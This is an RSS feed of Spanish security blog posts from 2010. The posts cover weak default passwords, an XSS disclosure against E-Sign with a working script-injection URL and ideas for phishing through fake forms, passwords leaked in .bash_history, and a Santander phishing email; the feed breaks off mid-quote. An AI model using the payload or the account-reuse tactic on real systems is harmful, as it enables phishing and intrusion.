<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>El rincón de Zerial &#187; Seguridad</title>
	<atom:link href="http://blog.zerial.org/tag/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.zerial.org</link>
	<description>Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio</description>
	<lastBuildDate>Tue, 20 Jul 2010 18:13:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>La inseguridad de los accesos por defecto en los sistemas</title>
		<link>http://blog.zerial.org/seguridad/la-inseguridad-de-los-accesos-por-defecto-en-los-sistemas/</link>
		<comments>http://blog.zerial.org/seguridad/la-inseguridad-de-los-accesos-por-defecto-en-los-sistemas/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 02:47:09 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[vulnerabilidades]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1746</guid>
		<description><![CDATA[Como desarrollador y administrador de sistemas, he tenido varias experiencias y se como funciona esto de la asignación de contraseñas y de accesos por defecto, ya sea cuando el sistema lo usaran unas cuantas personas o varias. Me refiero tanto a los sitemas web como accesos por distintos servicios tales como ssh, ftp, correos electrónicos, [...]]]></description>
			<content:encoded><![CDATA[<p>Como desarrollador y administrador de sistemas, he tenido varias experiencias y se como funciona esto de la asignación de contraseñas y de accesos por defecto, ya sea cuando el sistema lo usaran unas cuantas personas o varias. Me refiero tanto a los sitemas web como accesos por distintos servicios tales como ssh, ftp, correos electrónicos, etc.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/06/username.jpg"><br />
</a><a href="http://blog.zerial.org/wp-content/uploads/2010/06/username1.jpg"><img class="aligncenter size-full wp-image-1752" title="username" src="http://blog.zerial.org/wp-content/uploads/2010/06/username1.jpg" alt="" width="371" height="157" /></a></p>
<p>Generalmente los criterios para asignar accesos a los distintos sistemas es los mismos, existen las que son aleatorias con y sin patrones, las típicas &#8220;dos letras iniciales del apellido seguido del año de nacimiento&#8221;, etc. Quizá el problema no está en asignarles claves por defecto fáciles a los usuarios, sino en los mismos usuarios que no las cambian o bien tardan una eternidad en ingresar por primera vez al sistema. Por esto mismo, pienso que la seguridad de los sistemas no debe depende de los usuarios, debe depender del sistema, a menos que tengamos muy acotado el tipo de usuarios que tendrá el sistema.<br />
En este post hablaré sobre los tipicos accesos a universidades, cuentas de correo de empresas, cuentas de servidores ftp, ssh, web, etc.</p>
<p><span id="more-1746"></span></p>
<p>En primer lugar, pienso que, el hecho de querer facilitarle las cosas al usuario final asignandole una password que sea &#8220;recordable&#8221;, es riesgoso. El hecho de que una password siga un patrón quiere decir que es altamente descifrable o <em>descubrible</em> por un atacante. Como patrónoes entendemos password como:</p>
<ul>
<li>usuarioYYYY: donde YYYY puede ser el año de nacimiento, el año que la persona ingreso a la institución u otra cosa que tenga relación.</li>
<li>Primeros o últimos 3 o 4 digitos del rut: Por ejemplo si el rut de una persona es 6.714.870-9, la clave podría ser 6714 o bien 8709</li>
<li>Nombre de usuario: aunque no lo crean, es muy comun tambien que se asigne como contraseña lo mismo que le entregan como nombre de usuario</li>
<li>Juego con las iniciales de los nombres y/o apellidos y año de nacimiento o año de ingreso: Por ejemplo, para Juan Perez, una posible password sería jperez2009, juanp2009, jp2010, etc.</li>
</ul>
<p>Quiza lo que acaban de leer pareciera ser algo muy estúpico o algo demasiado básico, pero es increible que suceda. Hace un par de semanas publiqué dos ejemplos muy claros al respecto, lo pueden ver en:</p>
<p><a href="http://blog.zerial.org/seguridad/seguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa/">La poca importancia de la seguridad en la Universidad Mayor<br />
Seguridad en accesos de ex alumnos del Instituto Profesional CIISA</a></p>
<p>El hecho de saber un patrón de asignaciones de contraseñas por defecto de una empresa o alguna institución les abre una puerta trasera enorme y, a mi criterio, es una vulnerabilidad que debe ser considerada critica si se desea proteger el robo de información y la privacidad de la institución y de los mismos usuarios.</p>
<p>La contraseña de un usuario puede comprometer el acceso a otros usuarios, por ejemplo si mi password por defecto corresponde a la primera inicial de mi nombre, seguido de mi apellido, luego un guión bajo (_) y finalmente mi año de nacimiento y es interceptada por algun atacante, sea como sea, independiente de que esa persona haya querido atacarme a mi o independiende de que si yo tengo informacion privada o si me interesa la seguridad o no, estoy dando el paso para que esa pesona pueda adivinar contraseñas de las demas personas.</p>
<p>Un caso muy comun es el hecho que cuando una persona ingresa a trabajar a una empresa generalmente le preparan un computador con todo listo, su cuenta de correo lista, configurada y lista para usarse por lo que el usuario jamás tendrá curiosidad de cambiarla, asi mismo todos o la gran mayoría de la empresa. Una persona sin muchos conocimientos podría probar el mismo patrón de contraseñas para ingresar como su compañero de trabajo, luego que ingresa al correo de esa persona exitosamente, lo gracioso sería intentar ingresar a otras cuentas por ejemplo al sistema de tickets u otros sistemas con el que podríamos hacer más daño. Según mi punto de vista, las contraseñas por defecto deberían ser por defecto aleatorias y obligar a que el usuario se loguee apenas es creada la cuenta y cuando ingrese por primera vez obligarlo a cambiar la contraseña.</p>
<p>Los desarrolladores o administradores pueden quejarse con la típica frase &#8220;es que son sistemas que acceder desde la red interna, desde la lan solamente&#8221;, pero la verdad es que uno nunca sabe desde que lado esta el atacante.</p>
<p>Aunque no lo crean, muchas veces esas mismas empresas que le asignan esas contraseñas por defecto a sus empleados, lo hacen tambien con sus clientes. Por ejemplo, una empresa de hosting o diseño web, en ambos casos, cuando le quieren dar acceso a ftp o bien acceso a algun sistema para que hagan el &#8220;testing&#8221;, cumplen el mismo patron, si no es &#8220;123456&#8243; es, por lo general, el nombre del cliente. Puedo entender que es engorroso asignar contraseñas tan dificiles de recrodad a los clientes para que hagan simplemente un checkeo de una aplicación, pero aveces la seguridad requiere de un poco de esfuerzo.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-inseguridad-de-los-accesos-por-defecto-en-los-sistemas%2F&amp;linkname=La%20inseguridad%20de%20los%20accesos%20por%20defecto%20en%20los%20sistemas">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/la-inseguridad-de-los-accesos-por-defecto-en-los-sistemas/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cross-Site Scripting en sitio VeriSign Chile (E-Sign)</title>
		<link>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/</link>
		<comments>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 18:49:57 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[ssl]]></category>
		<category><![CDATA[verisign]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1715</guid>
		<description><![CDATA[E-Sign (cl) corresponde a los representantes y/o partners de VeriSign, una reconocida marca de seguridad informática a nivel mundial y como tal, ofrecen servicios de seguridad informatica, certificados de seguridad, auditorias, etc. La empresa E-Sign ofrece el servicio de Anti Phishing y Consultoría de Seguridad, entre otros. Sin embargo, el sitio web de dicha empresa [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esignverisign.png"><img class="size-full wp-image-1718 alignleft" style="margin-left: 1px; margin-right: 1px;" title="esignverisign" src="http://blog.zerial.org/wp-content/uploads/2010/04/esignverisign.png" alt="" width="172" height="44" /></a><a href="http://www.e-sign.cl">E-Sign (cl)</a> corresponde a los representantes y/o partners de <a href="http://www.verisign.com/">VeriSign</a>, una reconocida marca de seguridad informática a nivel mundial y como tal, ofrecen servicios de seguridad informatica, certificados de seguridad, auditorias, etc.<br />
La empresa E-Sign ofrece el servicio de <strong>Anti Phishing</strong> y Consultoría de Seguridad, entre otros. Sin embargo, el sitio web de dicha empresa es <strong>vulnerable</strong> a Cross-Site Scripting y mediante esto, podemos hacer phishing usando la &#8220;credibilidad&#8221; de su certificado SSL.</p>
<p>La idea de un sitio con certificado SSL es que toda la información viaje cifrada, pero la gente de E-Sign al parecer no piensan eso. Al menos dos formularios del sitio envían la información sin cifrar, entonces ¿Para qué usan el certificado SSL?</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form1.png"><img class="aligncenter size-full wp-image-1727" title="esign_form1" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form1.png" alt="" width="543" height="64" /></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form2.png"><img class="aligncenter size-full wp-image-1728" title="esign_form2" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form2.png" alt="" width="519" height="55" /></a></p>
<p>Quizá no es tan crítico, ya que se trata del formulario de contacto y el buscador, pero ya que ellos <strong>obligan</strong> al usuario a confiar de ellos aun cuando los formularios no se envian de forma segura, nosotros aprovecharemos de generar otro tipo de trafico de manera insegura, por ejemplo insertando un formulario falso o un sitio externo mediante XSS.</p>
<p><span id="more-1715"></span></p>
<p>¿A qué me refiero con esto? Sencillo, cuando estás navegando en un sitio seguro y en él, existe información que viaja de manera no-segura (sin cifrar), el navegador nos alerta y nos pregunta si queremos continuar.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_warning.png"><img class="aligncenter size-full wp-image-1731" title="esign_warning" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_warning.png" alt="" width="669" height="168" /></a></p>
<p>En cierta forma, E-Sign está obligando al usuario a confiar en ellos y para proceder, el usuario tendrá que poner aceptar. Si ellos lo hacen, ¿por qué nosotros no?</p>
<p>Nos aprovechamos de una vulnerabilidad XSS que presentan algunos links, por ejemplo link de &#8220;Contacto&#8221;:</p>
<p><a href="https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E" target="_blank">https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E</a></p>
<p>Mediante XSS podriamos perfectamente modificar el formulario, agregar y quitar campos y redireccionar la informción hacia otro sitio o bien colocar un iframe externo que nos permita insertar un formulario arbitrario para capturar información que necesitamos.</p>
<p>Con un poco de ingenieria social y un poco del arte del engaño, seguramente podemos explotar aun mas esta vulnerabilidad. Muchas veces la vulnerabilidad va más alla de si misma, depende mucho del sitio sobre el cual se intenta explotar, en este caso, es mucho mas grave que en el caso del <a href="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/">post anterior</a>.</p>
<p>Lo que encuentro más problematico, es que una empresa de seguridad, quienes ofrecen un servicio Anti Phishing, tengan este tipo de vulnerabilidades, le resta demasiada credibilidad a la empresa, lamentablemente las personas que contratan estos servicios generalmente no saben mucho del tema y creen que estaran en buenas manos y muchas veces estan cometiendo un error entregando su seguridad a las personas equivocadas.</p>
<p>Como de costumbre, intenté contactarme con los encargados mediante el formulario de contacto del sitio pero no he obtenido ningun tipo de respuesta.</p>
<p><strong>ACTUALIZACIóN &#8211; 3/Mayo/2010: </strong>La empresa se ha contactado conmigo via email. <a href="http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/">Más información acá</a>.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Cosas que encontramos en los archivos .bash_history</title>
		<link>http://blog.zerial.org/seguridad/cosas-que-encontramos-en-los-archivos-bash_history/</link>
		<comments>http://blog.zerial.org/seguridad/cosas-que-encontramos-en-los-archivos-bash_history/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 14:00:47 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Historias]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[comandos]]></category>
		<category><![CDATA[gnu/linux]]></category>
		<category><![CDATA[historial de comandos]]></category>
		<category><![CDATA[prompt]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1668</guid>
		<description><![CDATA[El otro día, haciendo revisión y limpieza en los servidores, me dediqué por un par de minutos a revisar los archivos .bash_history de algunos usuarios y me encontre con varias sorpresas, desde cosas chistosas hasta problemas críticos de seguridad. Los usuarios son muy buenos para inventar comandos, probar cosas, inventar pasarle parametros a los comandos, [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/bhistory.png"><img class="size-full wp-image-1697 alignleft" style="margin-right: 3px; margin-left: 3px;" title="bhistory" src="http://blog.zerial.org/wp-content/uploads/2010/04/bhistory.png" alt="" width="136" height="201" /></a>El otro día, haciendo revisión y limpieza en los servidores, me dediqué por un par de minutos a revisar los archivos <em>.bash_history</em> de algunos usuarios y me encontre con varias sorpresas, desde cosas chistosas hasta problemas críticos de seguridad. Los usuarios son muy buenos para inventar comandos, probar cosas, inventar pasarle parametros a los comandos, etc, es muy chistoso ver como se pasean por mil directorios antes de llegar a donde quieren llegar, como visualizan los archivos o como encuentran lo que buscan. Está bien que los usuarios son solo usuarios, no deberían por qué saber ni ser expertos en ejecutar comandos unix en un prompt, pero aun asi sigue pareciendo cómico para uno ver cómo lo hacen.<br />
Para quienes no saben, el archivo <em>.bash_history</em> corresponde a un archivo de registro o logs que guarda los comandos ejecutados en bash por un usuario en particular, cuando un usuario ingresa vía ssh a un sistema por ejemplo, ejecuta los típicos comandos &#8220;dir, cd, ls&#8221; y estos quedan registrados.</p>
<p><span id="more-1668"></span></p>
<p>Lo más comun, y que me da muca risa y aveces rabia, y me desespera un poco, es ver como los usuarios avanzan lentamente, directorio por directorio, hasta llegar a la destino final. Por ejemplo:</p>
<p><code>$ cd /<br />
$ cd home<br />
$ cd usuario<br />
$ cd public_html<br />
$ cd includes</code></p>
<p>En lugar de ejecutar directamente<br />
<code>$ cd /home/usuario/public_html/includes</code></p>
<p>Y peor aun, hay veces que el usuario es inseguro y prefiere verificar si lo hizo bien y termina su caminata por los directorios haciendo un &#8220;pwd&#8221;:</p>
<p><code>$ cd /<br />
$ cd home<br />
$ cd usuario<br />
$ cd public_html<br />
$ cd includes<br />
$ pwd<br />
/home/usuario/public_html/includes<br />
$</code></p>
<p>Hay algo que me desespera aun mas, es cuando el usuario tiene la necesidad de listar el contenido de CADA directorio:</p>
<p><code>$ cd /<br />
$ ls -l<br />
$ cd home<br />
$ ls -l<br />
$ cd usuario<br />
$ ls -l<br />
$ cd public_html<br />
$ ls -l<br />
$ cd includes<br />
$ pwd<br />
/home/usuario/public_html/includes<br />
$ ls -l</code></p>
<p>Para los que no saben, para esto existe un truco (tip!), no digo que se aprendan los directorios de memoria, pero pueden ejecutar todo en una sola linea, por ejemplo, cuando escriben / pueden presionar tabular dos veces y automaticamente aparecerá el listado de archivos y directorios dentro de /. Asi mismo, si escriben /home/ y dos veces tabular, veran todo el contenido de /home, sin tener que ejecutar cd /home, presionar enter y luego un ls.</p>
<p>Otra cosa que es muy comun, aunque no lo crean, es encontrar las passwords de las bases de datos, especialmente de MySQL. La gente está acostumbrada a ejecutar el comando mysql para conectarse a la base de datos pasandole como parametro el usuario y la password</p>
<p><code>$ mysql -uproduccion -p4gSg4ws -hlocalhost mydatabase<br />
mysql&gt;</code></p>
<p>Tambien usan esta misma tecnica para generar los típicos respaldos usando mysqldump.</p>
<p><code>$ mysqldump -uproduccion -p4gSg4ws -hlocalhost mydatabase &gt;&gt;mydatabase.sql</code></p>
<p>Obviamente esto es un problema de seguridad, ya sea porque no se educó bien al usuario o simplemente porque no existen medidas de seguridad dentro del contexto donde se está ejecutando este tipo de comandos.</p>
<p>Tambien es muy usual encontrar a usuarios que intentan pasarle la password de root al comando &#8220;su&#8221;, ejecutando comandos tipo:</p>
<p><code>$ su - 354dr2</code></p>
<p>Pensando que 354dr2 es la password de root, al igual que</p>
<p><code>$ sudo su - password_del_usuario</code></p>
<p>Pensando que de esa forma no le pedirá el password. Lo que no sabe el usuario es que todo lo que ejecuta esta siendo logueado y que está comprometiendo la seguridad del servidor.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/bash-history-terminal.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/04/bash-history-terminal-150x150.png" alt="" title="bash-history-terminal" width="150" height="150" class="alignright size-thumbnail wp-image-1711" /></a>El .bash_history o historial de comandos bash, muestra mucho como trabajan los usuarios, qué hacen y de qué forma lo hacen, de esta forma es posible obtener información sobre algun sistema o servicio que esté corriendo en el servidor, por ejemplo si entramos <em>a la mala</em> a un servidor y queremos buscar información privada o información que nos interese, podemos ver el historial de los usuarios para saber qué hacen, por donde se mueven y seguir sus pasos.</p>
<p>Un dia me tocó ver que un usuario tenia un script &#8220;escondido&#8221; que se conectaba vía llave pública a 4 o 5 servidores (incluyendo uno fuera de la red), obviamente, la llave privada estaba en el servidor donde yo estabam por lo que pude acceder a todas sus cuentas en los otros servidores.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcosas-que-encontramos-en-los-archivos-bash_history%2F&amp;linkname=Cosas%20que%20encontramos%20en%20los%20archivos%20.bash_history">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/cosas-que-encontramos-en-los-archivos-bash_history/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Phishing a Banco Santander</title>
		<link>http://blog.zerial.org/seguridad/phishing-a-banco-santander/</link>
		<comments>http://blog.zerial.org/seguridad/phishing-a-banco-santander/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 00:34:42 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[banco]]></category>
		<category><![CDATA[banco santander]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[santander]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1670</guid>
		<description><![CDATA[A muchas personas, en su mayoría clientes del banco santander, les está llegando hace un tiempo correos con mensajes un tanto creibles y que, para una persona que no está bien preparada para enfrentar este tipo de engaños, podría transformarse en un problema. Los sitios de los bancos generalmente presentan inestabilidades que muchas veces ni [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/phishing.jpg"><img class="alignleft size-medium wp-image-1679" style="margin: 2px;" title="phishing" src="http://blog.zerial.org/wp-content/uploads/2010/04/phishing-300x200.jpg" alt="" width="139" height="90" /></a>A muchas personas, en su mayoría clientes del banco santander, les está llegando hace un tiempo correos con mensajes un tanto creibles y que, para una persona que no está bien preparada para enfrentar este tipo de engaños, podría transformarse en un problema. Los sitios de los bancos generalmente presentan inestabilidades que muchas veces ni las notamos, demora mas de la cuenta en cargar, aveces nos bota la sesion o simplemente el servicio no responde. Aludiendo a ésto, el mensaje de phishing nos envían empieza así:</p>
<blockquote><p>Es muy importante a leer.<br />
